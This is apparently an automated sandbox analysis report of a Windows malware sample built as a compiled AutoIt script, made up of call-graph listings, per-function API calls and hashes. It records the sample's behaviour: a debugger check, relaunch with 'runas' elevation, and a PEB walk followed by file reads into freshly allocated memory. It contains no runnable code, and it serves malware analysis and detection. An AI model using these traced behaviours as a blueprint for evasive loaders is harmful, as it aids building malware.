88427->88426 88462 463ad5 64 API calls __wcsicoll 88427->88462 88447->88405 88448->88405 88458->88412 88459->88417 88460->88419 88461->88424 88462->88426 88465 40da20 CloseHandle 88464->88465 88466 40de4e 88465->88466 88481 40f110 88466->88481 88469 4264fa 88471 40de84 88476->88305 88477->88315 88478->88328 88479->88293 88482 40f125 CreateFileW 88481->88482 88483 42630c 88481->88483 88485 40de74 88482->88485 88484 426311 CreateFileW 88483->88484 88483->88485 88484->88485 88486 426337 88484->88486 88485->88469 88489 40dea0 55 API calls ctype 88485->88489 88492 40df90 SetFilePointerEx SetFilePointerEx 88486->88492 88489->88471 88493->88340 88495 46e7a2 88494->88495 88496 4115d7 52 API calls 88495->88496 88499 46e802 88495->88499 88497 46e7ad 88496->88497 88498 46e7b9 88497->88498 88542 40da60 53 API calls 88497->88542 88504 4533eb 85 API calls 88498->88504 88500 46e7e5 88499->88500 88505 46e82f 88499->88505 88501 408f40 VariantClear 88500->88501 88503 46e7ea 88501->88503 88503->88344 88506 46e7ca 88504->88506 88508 46e8b5 88505->88508 88509 46e845 88505->88509 88507 40de40 60 API calls 88506->88507 88510 46e7d7 88507->88510 88535 4680ed 88508->88535 88512 4533eb 85 API calls 88509->88512 88510->88505 88513 46e7db 88510->88513 88520 46e84b 88512->88520 88513->88500 88516 44ae3e CloseHandle 88513->88516 88514 46e8bb 88539 443fbe 88514->88539 88515 46e87a 88543 4689f4 59 API calls 88515->88543 88516->88500 88517 46e883 88544 4013c0 52 API calls 88517->88544 88520->88515 88520->88517 88523 46e88f 88524 40e0a0 52 API calls 88523->88524 88526 46e899 88524->88526 88525 408f40 VariantClear 88533 46e881 88525->88533 88545 40d200 52 API calls 2 library calls 88526->88545 88528 46e911 88528->88344 88529 46e8a5 88530 40da20 CloseHandle 88532 46e903 88530->88532 88534 44ae3e CloseHandle 88532->88534 88533->88528 88533->88530 88534->88528 88536 468100 88535->88536 88537 4680fa 88535->88537 88536->88514 88547 467ac4 55 API calls 2 library calls 88537->88547 88548 443e36 88539->88548 88541 443fd3 88541->88525 88541->88533 88542->88498 88543->88533 88544->88523 88545->88529 88547->88536 88551 443e19 88548->88551 88552 443e26 88551->88552 88553 443e32 WriteFile 88551->88553 88554 443db4 SetFilePointerEx SetFilePointerEx 88552->88554 88553->88541 88554->88553 88555->88099 88556 42d154 88560 480a8d 88556->88560 88558 42d161 88559 480a8d 199 API calls 88558->88559 88559->88558 88561 480ae4 88560->88561 88562 480b26 88560->88562 88563 480aeb 88561->88563 88564 480b15 88561->88564 88565 40bc70 52 API calls 88562->88565 88566 480aee 88563->88566 88567 480b04 88563->88567 88593 4805bf 199 API calls 88564->88593 88573 480b2e 88565->88573 88566->88562 88569 480af3 88566->88569 88592 47fea2 199 API calls __itow_s 88567->88592 88591 47f135 199 API calls 88569->88591 88571 40e0a0 52 API calls 88571->88573 88573->88571 88576 480aff 88573->88576 88580 40e710 53 API calls 88573->88580 88581 401980 53 API calls 88573->88581 88583 40c2c0 52 API calls 88573->88583 88584 480ff5 88573->88584 88585 40a780 199 API calls 88573->88585 88587 408e80 VariantClear 88573->88587 88594 45377f 52 API calls 88573->88594 88595 45e951 53 API calls 88573->88595 88596 40e830 53 API calls 88573->88596 88597 47925f 53 API calls 88573->88597 88598 47fcff 199 API calls 88573->88598 88575 408f40 VariantClear 88577 481156 88575->88577 88576->88575 88578 408f40 VariantClear 88577->88578 88579 48115e 88578->88579 88579->88558 88580->88573 88581->88573 88583->88573 88599 45e737 90 API calls 3 library calls 88584->88599 88585->88573 88587->88573 88591->88576 88592->88576 88593->88576 88594->88573 88595->88573 88596->88573 88597->88573 88598->88573 88599->88576 88600 40b2b9 88603 40ccd0 88600->88603 88602 40b2c4 88643 40cc70 199 API calls 88603->88643 88605 40ccf3 88606 42c3bb 88605->88606 88608 40cd1b 88605->88608 88618 40cd8a ctype 88605->88618 88664 45e737 90 API calls 3 library calls 88606->88664 88612 40cd30 88608->88612 88617 40cdad 88608->88617 88609 40cd72 88652 402780 52 API calls 2 library calls 88609->88652 88612->88609 88612->88618 88651 402780 52 API calls 2 library calls 88612->88651 88613 40cd80 88653 40e7d0 336 API calls 88613->88653 88614 40ce40 88644 40ceb0 88614->88644 88617->88614 88622 42c3a0 88617->88622 88623 42c31a 88617->88623 88633 42c335 88617->88633 88634 42c370 88617->88634 88638 42c343 88617->88638 88654 40cc70 199 API calls 88617->88654 88618->88602 88619 40ce53 88620 408f40 VariantClear 88619->88620 88621 40ce5b 88620->88621 88624 408f40 VariantClear 88621->88624 88662 45e737 90 API calls 3 library calls 88622->88662 88655 45e737 90 API calls 3 library calls 88623->88655 88627 40ce63 88624->88627 88627->88602 88628 42c3ad 88663 452670 VariantClear 88628->88663 88630 42c327 88656 452670 VariantClear 88630->88656 88657 452670 VariantClear 88633->88657 88660 45e737 90 API calls 3 library calls 88634->88660 88637 42c392 88661 452670 VariantClear 88637->88661 88658 45e737 90 API calls 3 library calls 88638->88658 88641 42c362 88659 452670 VariantClear 88641->88659 88643->88605 88645 428c17 88644->88645 88646 40cebd 88644->88646 88665 473210 VariantClear 88645->88665 88648 4115d7 52 API calls 88646->88648 88650 40cec5 88648->88650 88649 428c21 88649->88619 88650->88619 88651->88612 88652->88613 88653->88618 88654->88617 88655->88630 88656->88618 88657->88618 88658->88641 88659->88618 88660->88637 88661->88618 88662->88628 88663->88618 88664->88618 88665->88649 88666 42b14b 88673 40bc10 88666->88673 88668 42b159 88669 4096a0 336 API calls 88668->88669 88670 42b177 88669->88670 88684 44b92d VariantClear 88670->88684 88672 42bc5b 88674 40bc24 88673->88674 88675 40bc17 88673->88675 88677 40bc2a 88674->88677 88678 40bc3c 88674->88678 88676 408e80 VariantClear 88675->88676 88679 40bc1f 88676->88679 88680 408e80 VariantClear 88677->88680 88681 4115d7 52 API calls 88678->88681 88679->88668 88682 40bc33 88680->88682 88683 40bc43 88681->88683 88682->88668 88683->88668 88684->88672 88685 425b2b 88690 40f000 88685->88690 88689 425b3a 88691 4115d7 52 API calls 88690->88691 88692 40f007 88691->88692 88693 4276ea 88692->88693 88699 40f030 88692->88699 88698 41130a 51 API calls __cinit 88698->88689 88700 40f039 88699->88700 88701 40f01a 88699->88701 88729 41130a 51 API calls __cinit 88700->88729 88703 40e500 88701->88703 88704 40bc70 52 API calls 88703->88704 88705 40e515 GetVersionExW 88704->88705 88706 402160 52 API calls 88705->88706 88707 40e557 88706->88707 88730 40e660 88707->88730 88712 427674 88717 4276c6 GetSystemInfo 88712->88717 88715 40e5e0 88719 4276d5 GetSystemInfo 88715->88719 88744 40efd0 88715->88744 88716 40e5cd GetCurrentProcess 88751 40ef20 LoadLibraryA GetProcAddress 88716->88751 88717->88719 88722 40e629 88748 40ef90 88722->88748 88725 40e641 FreeLibrary 88726 40e644 88725->88726 88727 40e653 FreeLibrary 88726->88727 88728 40e656 88726->88728 88727->88728 88728->88698 88729->88701 88731 40e667 88730->88731 88732 42761d 88731->88732 88733 40c600 52 API calls 88731->88733 88734 40e55c 88733->88734 88735 40e680 88734->88735 88736 40e687 88735->88736 88737 427616 88736->88737 88738 40c600 52 API calls 88736->88738 88739 40e566 88738->88739 88739->88712 88740 40ef60 88739->88740 88741 40e5c8 88740->88741 88742 40ef66 LoadLibraryA 88740->88742 88741->88715 88741->88716 88742->88741 88743 40ef77 GetProcAddress 88742->88743 88743->88741 88745 40e620 88744->88745 88746 40efd6 LoadLibraryA 88744->88746 88745->88717 88745->88722 88746->88745 88747 40efe7 GetProcAddress 88746->88747 88747->88745 88752 40efb0 LoadLibraryA GetProcAddress 88748->88752 88750 40e632 GetNativeSystemInfo 88750->88725 88750->88726 88751->88715 88752->88750 88753 3d996a3 88754 3d996b8 88753->88754 88755 3d96d48 GetPEB 88754->88755 88756 3d996c4 88755->88756 88757 3d99778 88756->88757 88758 3d996e2 88756->88758 88775 3d9a028 9 API calls 88757->88775 88762 3d99388 88758->88762 88761 3d9975f 88763 3d96d48 GetPEB 88762->88763 88766 3d99427 88763->88766 88765 3d99458 CreateFileW 88765->88766 88772 3d99465 88765->88772 88767 3d99481 VirtualAlloc 88766->88767 88766->88772 88773 3d99588 CloseHandle 88766->88773 88774 3d99598 VirtualFree 88766->88774 88776 3d9a298 GetPEB 88766->88776 88768 3d994a2 ReadFile 88767->88768 88767->88772 88771 3d994c0 VirtualAlloc 88768->88771 88768->88772 88769 3d99682 88769->88761 88770 3d99674 VirtualFree 88770->88769 88771->88766 88771->88772 88772->88769 88772->88770 88773->88766 88774->88766 88775->88761 88777 3d9a2c2 88776->88777 88777->88765 88778 425b5e 88783 40c7f0 88778->88783 88782 425b6d 88818 40db10 52 API calls 88783->88818 88785 40c82a 88819 410ab0 6 API calls 88785->88819 88787 40c86d 88788 40bc70 52 API calls 88787->88788 88789 40c877 88788->88789 88790 40bc70 52 API calls 88789->88790 88791 40c881 88790->88791 88792 40bc70 52 API calls 88791->88792 88793 40c88b 88792->88793 88794 40bc70 52 API calls 88793->88794 88795 40c8d1 88794->88795 88796 40bc70 52 API calls 88795->88796 88797 40c991 88796->88797 88820 40d2c0 52 API calls 88797->88820 88799 40c99b 88821 40d0d0 53 API calls 88799->88821 88801 40c9c1 88802 40bc70 52 API calls 88801->88802 88803 40c9cb 88802->88803 88822 40e310 53 API calls 88803->88822 88805 40ca28 88806 408f40 VariantClear 88805->88806 88807 40ca30 88806->88807 88808 408f40 VariantClear 88807->88808 88809 40ca38 GetStdHandle 88808->88809 88810 429630 88809->88810 88811 40ca87 88809->88811 88810->88811 88812 429639 88810->88812 88817 41130a 51 API calls __cinit 88811->88817 88823 4432c0 57 API calls 88812->88823 88814 429641 88824 44b6ab CreateThread 88814->88824 88816 42964f CloseHandle 88816->88811 88817->88782 88818->88785 88819->88787 88820->88799 88821->88801 88822->88805 88823->88814 88824->88816 88825 44b5cb 58 API calls 88824->88825 88826 425b6f 88831 40dc90 88826->88831 88830 425b7e 88832 40bc70 52 API calls 88831->88832 88833 40dd03 88832->88833 88840 40f210 88833->88840 88835 40dd96 88836 426a97 88835->88836 88838 40ddb7 88835->88838 88843 40dc00 52 API calls 2 library calls 88835->88843 88839 41130a 51 API calls __cinit 88838->88839 88839->88830 88844 40f250 RegOpenKeyExW 88840->88844 88842 40f230 88842->88835 88843->88835 88845 425e17 88844->88845 88846 40f275 RegQueryValueExW 88844->88846 88845->88842 88847 40f2c3 RegCloseKey 88846->88847 88848 40f298 88846->88848 88847->88842 88849 40f2a9 RegCloseKey 88848->88849 88850 425e1d 88848->88850 88849->88842
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 004096C1
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 0040970C
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                        • _memmove.LIBCMT ref: 00409D96
                                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                                        • _memmove.LIBCMT ref: 004297E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                        • String ID:
                                                                        • API String ID: 2383988440-0
                                                                        • Opcode ID: c9aeae05f9e297f4f4d27e5cc88271dfec8111064548994f186f59c23e97ced8
                                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                        • Opcode Fuzzy Hash: c9aeae05f9e297f4f4d27e5cc88271dfec8111064548994f186f59c23e97ced8
                                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,00000104,?), ref: 00401F4C
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                        • String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                        • API String ID: 2495805114-3216005610
                                                                        • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                        • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1919 427693-427696 1915->1919 1920 427688-427691 1915->1920 1924 4276b4-4276be 1916->1924 1921 427625-427629 1917->1921 1922 40e59c-40e59f 1917->1922 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1919->1924 1927 427698-4276a8 1919->1927 1920->1924 1929 427636-427640 1921->1929 1930 42762b-427631 1921->1930 1925 40e5a5-40e5ae 1922->1925 1926 427654-427657 1922->1926 1937 4276c6-4276ca GetSystemInfo 1924->1937 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1924 1934->1924 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                        • String ID: 0SH$#v
                                                                        • API String ID: 3363477735-2448020801
                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                        • API String ID: 2574300362-3542929980
                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                        • String ID: #v
                                                                        • API String ID: 3403648963-554117064
                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                        • API String ID: 1762048999-758534266
                                                                        • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                        • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,00000104,?), ref: 00401F4C
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,00000104), ref: 00428B5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
